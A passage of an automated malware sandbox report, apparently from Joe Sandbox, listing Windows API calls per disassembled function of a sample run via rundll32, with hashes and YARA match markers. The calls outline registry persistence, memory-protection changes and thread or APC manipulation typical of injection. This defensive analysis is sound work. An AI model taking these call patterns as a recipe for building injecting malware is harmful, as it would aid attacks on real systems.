                                • Part of subcall function 0594BAD1: wcscpy.NTDLL ref: 0594BC01
                              • WaitForSingleObject.KERNEL32(00000000,?,05F39998,?,00000000,00000000,00000001), ref: 05943A03
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05943A3D
                              • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 05943A60
                              • RegCloseKey.ADVAPI32(?), ref: 05943A69
                              • WaitForSingleObject.KERNEL32(00000000), ref: 05943ACD
                              • RtlExitUserThread.NTDLL(?), ref: 05943B03
                                • Part of subcall function 0594A651: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76C86920,00000000,?,?,?,0593148A,?,?,?), ref: 0594A66F
                                • Part of subcall function 0594A651: GetFileSize.KERNEL32(00000000,00000000,?,?,0593148A,?,?,?), ref: 0594A67F
                                • Part of subcall function 0594A651: CloseHandle.KERNEL32(000000FF,?,?,0593148A,?,?,?), ref: 0594A6E1
                              • CreateProcessA.KERNEL32(?,?,?,76CDF750,?,?,?,?,?,?,?,?,76CDF750), ref: 05943B5C
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0593F3DB
                                • Part of subcall function 0593F39B: GetLastError.KERNEL32 ref: 0593F3E5
                                • Part of subcall function 0593F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0593F40A
                                • Part of subcall function 0593F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0593F42D
                                • Part of subcall function 0593F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0593F455
                                • Part of subcall function 0593F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0593F46A
                                • Part of subcall function 0593F39B: SetEndOfFile.KERNEL32(00001000), ref: 0593F477
                                • Part of subcall function 0593F39B: CloseHandle.KERNEL32(00001000), ref: 0593F48F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Createlstrlen$CloseObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerProcessSizeThreadUserValueWritewcscpy
                              • String ID:
                              • API String ID: 3876914104-0
                              • Opcode ID: 399cad79aff6905c1e145a7ed3fdb29d7309027884980195480cdd29907ac0d5
                              • Instruction ID: 3c4970fb4b4c7fc44ab0a224750438d271eb9e6a6cd880c42b8c89459400ca9a
                              • Opcode Fuzzy Hash: 399cad79aff6905c1e145a7ed3fdb29d7309027884980195480cdd29907ac0d5
                              • Instruction Fuzzy Hash: BF614E71A14209AFEB00DFA5C885EAEBBBDFB08324F014525FA09E7250DB34AD61CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Control-flow graph (rendered graph omitted): entry block 5938c35-5938c63; executed/not-executed colouring of the blocks is not recoverable from the text dump
                              APIs
                                • Part of subcall function 059333A5: VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 059333CA
                                • Part of subcall function 059333A5: GetLastError.KERNEL32(?,00000000), ref: 059333D2
                                • Part of subcall function 059333A5: VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 059333E9
                                • Part of subcall function 059333A5: VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0593340E
                              • GetLastError.KERNEL32(00000000,00000004,?,?,80000000,00000000,00000001,059560B0,0000001C,0594BE61,00000002,?,00000001,80000000,05959A20,80000000), ref: 05938D90
                                • Part of subcall function 0593A253: lstrlen.KERNEL32(?,?), ref: 0593A28B
                                • Part of subcall function 0593A253: lstrcpy.KERNEL32(00000000,?), ref: 0593A2A2
                                • Part of subcall function 0593A253: StrChrA.SHLWAPI(00000000,0000002E), ref: 0593A2AB
                                • Part of subcall function 0593A253: GetModuleHandleA.KERNEL32(00000000), ref: 0593A2C9
                              • VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,?,?,?,?,?,00000000,00000004,?,?,80000000), ref: 05938D0D
                              • VirtualProtect.KERNEL32(?,00000004,?,?,?,?,00000000,00000004,?,?,80000000,00000000,00000001,059560B0,0000001C,0594BE61), ref: 05938D28
                              • RtlEnterCriticalSection.NTDLL(0595A400), ref: 05938D4D
                              • RtlLeaveCriticalSection.NTDLL(0595A400), ref: 05938D6B
                                • Part of subcall function 059333A5: SetLastError.KERNEL32(80000000,?,00000000), ref: 05933417
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$Protect$ErrorLast$CriticalSection$EnterHandleLeaveModuleQuerylstrcpylstrlen
                              • String ID:
                              • API String ID: 899430048-3916222277
                              • Opcode ID: 8eb11c7bb34a20d6b69d80c6bf30b3b78e7cf2a775e6016c9c8f6bbd4e0d5932
                              • Instruction ID: 7cd9ec9f9c19adfe31b01e8c64bbd864fc0670731e49d15b52de39c510685784
                              • Opcode Fuzzy Hash: 8eb11c7bb34a20d6b69d80c6bf30b3b78e7cf2a775e6016c9c8f6bbd4e0d5932
                              • Instruction Fuzzy Hash: 63415B71900619EFDB11DF68C84AAAEBBF9FF48310F148219F925AB650D774E950CFA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Control-flow graph (rendered graph omitted): entry block 59455e4-5945623; executed/not-executed colouring of the blocks is not recoverable from the text dump
                              APIs
                                • Part of subcall function 059461AE: GetProcAddress.KERNEL32(?,00000318), ref: 059461D3
                                • Part of subcall function 059461AE: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 059461EF
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0594561D
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 05945708
                                • Part of subcall function 059461AE: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 05946359
                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 05945653
                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0594565F
                              • lstrcmpi.KERNEL32(?,00000000), ref: 0594569C
                              • StrChrA.SHLWAPI(?,0000002E), ref: 059456A5
                              • lstrcmpi.KERNEL32(?,00000000), ref: 059456B7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
                              • String ID:
                              • API String ID: 3901270786-0
                              • Opcode ID: ceeec7b0763a1db7dd5ba2df0f528243c209ae05852fbd0e68c46d97a0748565
                              • Instruction ID: 1340f948a491b6757fb3af7dc9d1889c94f4d8cf5baa538b10c0ab0db7965e20
                              • Opcode Fuzzy Hash: ceeec7b0763a1db7dd5ba2df0f528243c209ae05852fbd0e68c46d97a0748565
                              • Instruction Fuzzy Hash: 0F316D71509311ABD721CF51D844F2BBBE9FF88B54F120918F989A6240D770ED14CFA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                                • Part of subcall function 059373EB: memset.NTDLL ref: 059373F5
                              • OpenEventA.KERNEL32(00000002,00000000,00000000,00000000,?,0593E2A4,?,?,?,?,?,?,?,05939100,?), ref: 05931381
                              • SetEvent.KERNEL32(00000000,?,0593E2A4,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 0593138E
                              • Sleep.KERNEL32(00000BB8,?,0593E2A4,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 05931399
                              • ResetEvent.KERNEL32(00000000,?,0593E2A4,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059313A0
                              • CloseHandle.KERNEL32(00000000,?,0593E2A4,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 059313A7
                              • GetShellWindow.USER32 ref: 059313B2
                              • GetWindowThreadProcessId.USER32(00000000), ref: 059313B9
                                • Part of subcall function 0594B1DC: RegCloseKey.ADVAPI32(0593E2A4), ref: 0594B25F
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                              • String ID:
                              • API String ID: 53838381-0
                              • Opcode ID: 227467115767ce61aa053b5b40174f072bf196d959b418e425468932ceb0b39d
                              • Instruction ID: d4f12e45d6063370a2b7b0b88d4e8da50ea0174c6852e30bd13d59eb10f2d561
                              • Opcode Fuzzy Hash: 227467115767ce61aa053b5b40174f072bf196d959b418e425468932ceb0b39d
                              • Instruction Fuzzy Hash: 3121B072618300FFC3106B66AC4BE2FBF6EFBC9611B558104F60A87501DF35A851DBA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetLastError.KERNEL32(?,?,80000000,00000001,?,059560C0,00000018,05934B2B,?,00000201,05959A24,059599DC,-0000000C,?), ref: 05945843
                              • VirtualProtect.KERNEL32(00000000,00000004,?,?,00000000,00000004,?,?,?,?,80000000,00000001,?,059560C0,00000018,05934B2B), ref: 059458CE
                              • RtlEnterCriticalSection.NTDLL(0595A400), ref: 059458F7
                              • RtlLeaveCriticalSection.NTDLL(0595A400), ref: 05945915
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                              • String ID:
                              • API String ID: 3666628472-0
                              • Opcode ID: f860fbf494a4c6c85eac53d10974e53c411937a65418787ea6b54726f0545723
                              • Instruction ID: 24734e651adaf4683b53fb68b9cdb431955c881c238b9e1bfe2cb28cc2cf8b4a
                              • Opcode Fuzzy Hash: f860fbf494a4c6c85eac53d10974e53c411937a65418787ea6b54726f0545723
                              • Instruction Fuzzy Hash: AF414F71A00709EFDB11DFA5C885EADBBF9FF48310B118515E919D7210D774AA61CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Control-flow graph (rendered graph omitted): entry block 5948f62-5948f75; executed/not-executed colouring of the blocks is not recoverable from the text dump
                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetModuleHandleA.KERNEL32(?,00000020,?,00008664,?,0593C71A,0593C71A,?,05946EFA,?,0593C71A,?,?,00000000), ref: 05948F87
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05948FA9
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05948FBF
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05948FD5
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05948FEB
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05949001
                                • Part of subcall function 0593710A: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000), ref: 05937167
                                • Part of subcall function 0593710A: memset.NTDLL ref: 0593718B
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 3012371009-0
                              • Opcode ID: bc409e5dd86fe1b417dcdc8b5425076513627e053b8ec447c2c5317bd950d7e9
                              • Instruction ID: 9aa32fc89f6761880b7770725359222e2fc6e72f04080ee58d919900917cbc49
                              • Opcode Fuzzy Hash: bc409e5dd86fe1b417dcdc8b5425076513627e053b8ec447c2c5317bd950d7e9
                              • Instruction Fuzzy Hash: FB2157B060430AAFDB20EFA9D885D6BBBECFF04240B014526F905C7201EB74EE158F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,00000000,0594893A,0595A174,05950998), ref: 059473C1
                              • QueueUserAPC.KERNEL32(0594893A,00000000,?,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473D6
                              • GetLastError.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473E1
                              • TerminateThread.KERNEL32(00000000,00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473EB
                              • CloseHandle.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473F2
                              • SetLastError.KERNEL32(00000000,?,0594893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 059473FB
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                              • String ID:
                              • API String ID: 3832013932-0
                              • Opcode ID: 4240f9236d1ccb1c472324b0c53815aa1d4ce9eb13127da4feb1f0949fcaefc7
                              • Instruction ID: 7f74e3f4348b8afc8e666da6c54d9adb4bc40342c546f2f89555e1d15faf535b
                              • Opcode Fuzzy Hash: 4240f9236d1ccb1c472324b0c53815aa1d4ce9eb13127da4feb1f0949fcaefc7
                              • Instruction Fuzzy Hash: 99F0F832219321BBD7221BB1AD0AF6FFF69FB09755F468404F60591152DB2198218B95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0594ED35
                              • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 0594EDBF
                              • WaitForSingleObject.KERNEL32(00000064), ref: 0594EDCD
                              • SuspendThread.KERNEL32(?), ref: 0594EDE0
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                              • String ID: v
                              • API String ID: 3168247402-1801730948
                              • Opcode ID: 479b666dcc68bebf8b993e51d04407383adaa22888a582ddd2d19c766abfbb8f
                              • Instruction ID: 8003a1af58586ed1661ba033a8a90e8c9c96ee3087721b9557e13a15f750f0cf
                              • Opcode Fuzzy Hash: 479b666dcc68bebf8b993e51d04407383adaa22888a582ddd2d19c766abfbb8f
                              • Instruction Fuzzy Hash: 36412971108301AFE721DF64C845E6BBBEEFF88750F044929FA9482160D771E954CB63
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0594B7A4: RegCreateKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7B9
                                • Part of subcall function 0594B7A4: lstrlen.KERNEL32(05F3B7F0,00000000,00000000,00000000,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C,00000008,00000003), ref: 0594B7E2
                              • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F02
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 05951F16
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?), ref: 05951F30
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F4C
                              • RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,05932C89,?,?,?), ref: 05951F5A
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
                              • String ID:
                              • API String ID: 1633053242-0
                              • Opcode ID: cf6ed99b1148ab8aa40e185beebbde510e2a8190b9ce008597e6f691b799f054
                              • Instruction ID: 5b1ec3f59493c7aa7db693d2d56d90705e5f47d9faee468e24dde832aacae822
                              • Opcode Fuzzy Hash: cf6ed99b1148ab8aa40e185beebbde510e2a8190b9ce008597e6f691b799f054
                              • Instruction Fuzzy Hash: D71149B2514249FFDF019FA4DC85DAEBF7EFB88264B110426FA0593110EB319D64EB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32(?,?,?,?,?,0593111D,00000000), ref: 0594214D
                              • GetProcAddress.KERNEL32(00000000,?), ref: 05942166
                              • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,0593111D,00000000), ref: 05942183
                              • IsWow64Process.KERNEL32(?,?,?,?,?,?,0593111D,00000000), ref: 05942194
                              • FindCloseChangeNotification.KERNEL32(?,?,?,?,0593111D,00000000), ref: 059421A7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AddressChangeCloseFindHandleModuleNotificationOpenProcWow64
                              • String ID:
                              • API String ID: 1712524627-0
                              • Opcode ID: db615811658fa2f952f12f6a87981e68f02532a9688d3ee6279dcc22355320b4
                              • Instruction ID: e26e7b2d36b47d7598cea3d626a1bb05391e0c51443c671d4672358064fd355c
                              • Opcode Fuzzy Hash: db615811658fa2f952f12f6a87981e68f02532a9688d3ee6279dcc22355320b4
                              • Instruction Fuzzy Hash: 5A016D75518704FFCB11DF65DA49C9EBFACFB88692B104225FA06D3200EB305A51CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualProtect.KERNEL32(?,?,00000040,?,?,?,00000000), ref: 059333CA
                              • GetLastError.KERNEL32(?,00000000), ref: 059333D2
                              • VirtualQuery.KERNEL32(?,?,0000001C,?,00000000), ref: 059333E9
                              • VirtualProtect.KERNEL32(?,?,-2C9B417C,?,?,00000000), ref: 0593340E
                              • SetLastError.KERNEL32(80000000,?,00000000), ref: 05933417
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$ErrorLastProtect$Query
                              • String ID:
                              • API String ID: 148356745-0
                              • Opcode ID: 1a6f15cb30c62f3dfcf77150908f1c1ed6a9b49fca17e16d059ef0a6ed9cb42f
                              • Instruction ID: 08257919da1e12e25648b735722615051824ca4eef8c5fac31cf48a5171a376d
                              • Opcode Fuzzy Hash: 1a6f15cb30c62f3dfcf77150908f1c1ed6a9b49fca17e16d059ef0a6ed9cb42f
                              • Instruction Fuzzy Hash: 7D012972504209FFDF129FA5DC458AEBFBDFF082547018426F905D2211EB71D964DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,059362DD,?,?,?,?), ref: 05949686
                              • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0594969D
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,059362DD,?,?,?,?,?,?,00000000), ref: 059496B8
                              • RegQueryValueExA.KERNEL32(?,00000000,00000000,?,00000000,?,?,?,?,?,?,059362DD,?,?,?,?), ref: 059496D7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: HeapQueryValue$AllocateFree
                              • String ID:
                              • API String ID: 4267586637-0
                              • Opcode ID: 720a0b8004a6d1ec4f2ce182a73f6e9154ae88d946a03bbb541f3d08828e9e5a
                              • Instruction ID: b20c646835bc8f3c19aaae996aa0c60ec3ce393359485f2e30551bc3d1c1a733
                              • Opcode Fuzzy Hash: 720a0b8004a6d1ec4f2ce182a73f6e9154ae88d946a03bbb541f3d08828e9e5a
                              • Instruction Fuzzy Hash: DF1166B6510218FFDB12CF98DC84CEFBFBDEB89350B104066F906A6210E6715E50DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0595A170,00000000,05945D81,?,0593F2F7,?), ref: 059371D3
                              • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0595A170,00000000,05945D81,?,0593F2F7,?), ref: 059371DE
                              • _wcsupr.NTDLL ref: 059371EB
                              • lstrlenW.KERNEL32(00000000), ref: 059371F3
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                              • String ID:
                              • API String ID: 2533608484-0
                              • Opcode ID: 8f59dbf10e7ee7e99aea2c0e6c5ca073bd7ca9aca22ab85a181fd3a92aa81a14
                              • Instruction ID: 71226cd2640f656e38e86b97139102a8cb2fa7a85580e177140bc3983adf7995
                              • Opcode Fuzzy Hash: 8f59dbf10e7ee7e99aea2c0e6c5ca073bd7ca9aca22ab85a181fd3a92aa81a14
                              • Instruction Fuzzy Hash: FDF0E972209310AF9712ABB55C8EE7F9B5DFFC0AA5B210938F505D2140DF64CC11C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0594C3A3
                                • Part of subcall function 05938FAE: RtlEnterCriticalSection.NTDLL(00000000), ref: 05938FBA
                                • Part of subcall function 05938FAE: CloseHandle.KERNEL32(?), ref: 05938FC8
                                • Part of subcall function 05938FAE: RtlLeaveCriticalSection.NTDLL(00000000), ref: 05938FE4
                              • CloseHandle.KERNEL32(?), ref: 0594C3B1
                              • InterlockedDecrement.KERNEL32(0595A05C), ref: 0594C3C0
                                • Part of subcall function 0594E831: SetEvent.KERNEL32(00000330,0594C3DB), ref: 0594E83B
                                • Part of subcall function 0594E831: CloseHandle.KERNEL32(00000330), ref: 0594E850
                                • Part of subcall function 0594E831: HeapDestroy.KERNELBASE(05B40000), ref: 0594E860
                              • RtlExitUserThread.NTDLL(00000000), ref: 0594C3DC
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                              • String ID:
                              • API String ID: 1141245775-0
                              • Opcode ID: 4b1608e8929bbd4492da4bb46e1af1eccfa5baa45ea10128acd65c4d67515e7e
                              • Instruction ID: e3ae9bc295b0115e94fbd2a3e1cf30a049087d937b4ca3b1f59dbfb940791dfa
                              • Opcode Fuzzy Hash: 4b1608e8929bbd4492da4bb46e1af1eccfa5baa45ea10128acd65c4d67515e7e
                              • Instruction Fuzzy Hash: E9F08C30655304AFDB019B788C4AE6A7B79FB42731B520318F925872C0EB749C118BA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.417936945.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_7e0000_rundll32.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID: X
                              • API String ID: 544645111-3081909835
                              • Opcode ID: d03c72d7e842fa4832f716df22808e09d8396a560db8b875853e5f1b04437fe4
                              • Instruction ID: 07786d6ab351686d10f9ccd354293264e666848ce2f4cd41ed5d5d80c44f1eec
                              • Opcode Fuzzy Hash: d03c72d7e842fa4832f716df22808e09d8396a560db8b875853e5f1b04437fe4
                              • Instruction Fuzzy Hash: BF51AAB4E052488FCB18DF99C494A9DFBB1FF88310F25816ED959AB356D734A845CF80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 0594A477
                              • memcpy.NTDLL ref: 0594A49F
                                • Part of subcall function 05947950: NtAllocateVirtualMemory.NTDLL(0594EB0F,00000000,00000000,0594EB0F,00003000,00000040), ref: 05947981
                                • Part of subcall function 05947950: RtlNtStatusToDosError.NTDLL(00000000), ref: 05947988
                                • Part of subcall function 05947950: SetLastError.KERNEL32(00000000), ref: 0594798F
                              • GetLastError.KERNEL32(00000010,00000218,0595386D,00000100,?,00000318,00000008), ref: 0594A4B6
                              • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,0595386D,00000100), ref: 0594A599
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
                              • String ID:
                              • API String ID: 685050087-0
                              • Opcode ID: 0185e7ec3d9b23cbe7d258af1659f2bb7c591d7df9266f30b109a95c8b4c7b05
                              • Instruction ID: 958a5bd2bb91046c715c256a6df067c694d64b1f28bbf5df9002dab3988ba5f2
                              • Opcode Fuzzy Hash: 0185e7ec3d9b23cbe7d258af1659f2bb7c591d7df9266f30b109a95c8b4c7b05
                              • Instruction Fuzzy Hash: B04162B1644701AFD721DF65D945FABBBE9FB88310F00892DF999C6250E730E9148F52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0594B7A4: RegCreateKeyA.ADVAPI32(80000001,05F3B7F0,?), ref: 0594B7B9
                                • Part of subcall function 0594B7A4: lstrlen.KERNEL32(05F3B7F0,00000000,00000000,00000000,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C,00000008,00000003), ref: 0594B7E2
                              • RegQueryValueExA.KERNEL32(00000000,75BCC740,00000000,00000000,05959068,0593E6ED,00000001,00000000,05F3C314,0595906E,00000000,00000000,0594CB01,05F3C314,75BCC740,00000000), ref: 05946C72
                              • RegSetValueExA.KERNEL32(05959068,00000003,00000000,00000003,05959068,00000028), ref: 05946CB3
                              • RegCloseKey.ADVAPI32(?), ref: 05946CBF
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Value$CloseCreateQuerylstrlen
                              • String ID:
                              • API String ID: 2552977122-0
                              • Opcode ID: ab9a5980b9b1366058f4402f8e52eadea909ca4cb72a6aef1d1b2c860dffe23d
                              • Instruction ID: 8fb1ae621fadd88047396558cdeff2d5510a773c4f33e77165e4e18c618edf6f
                              • Opcode Fuzzy Hash: ab9a5980b9b1366058f4402f8e52eadea909ca4cb72a6aef1d1b2c860dffe23d
                              • Instruction Fuzzy Hash: BD3138B1914218EFEB21DBA8E945DAEBFBDFB45761B10452AFA00A2240D7345E64CF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0595087A: lstrlen.KERNEL32(?,00000000,0594BA3E,00000027,0595A1E8,?,00000000,?,?,0594BA3E,?,00000001,?,05940971,00000000,?), ref: 059508B0
                                • Part of subcall function 0595087A: lstrcpy.KERNEL32(00000000,00000000), ref: 059508D4
                                • Part of subcall function 0595087A: lstrcat.KERNEL32(00000000,00000000), ref: 059508DC
                              • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020119,?,?,?,00000000), ref: 059362A8
                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,?,?,00000000), ref: 059362BE
                              • RegCloseKey.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 05936307
                              Memory Dump Source
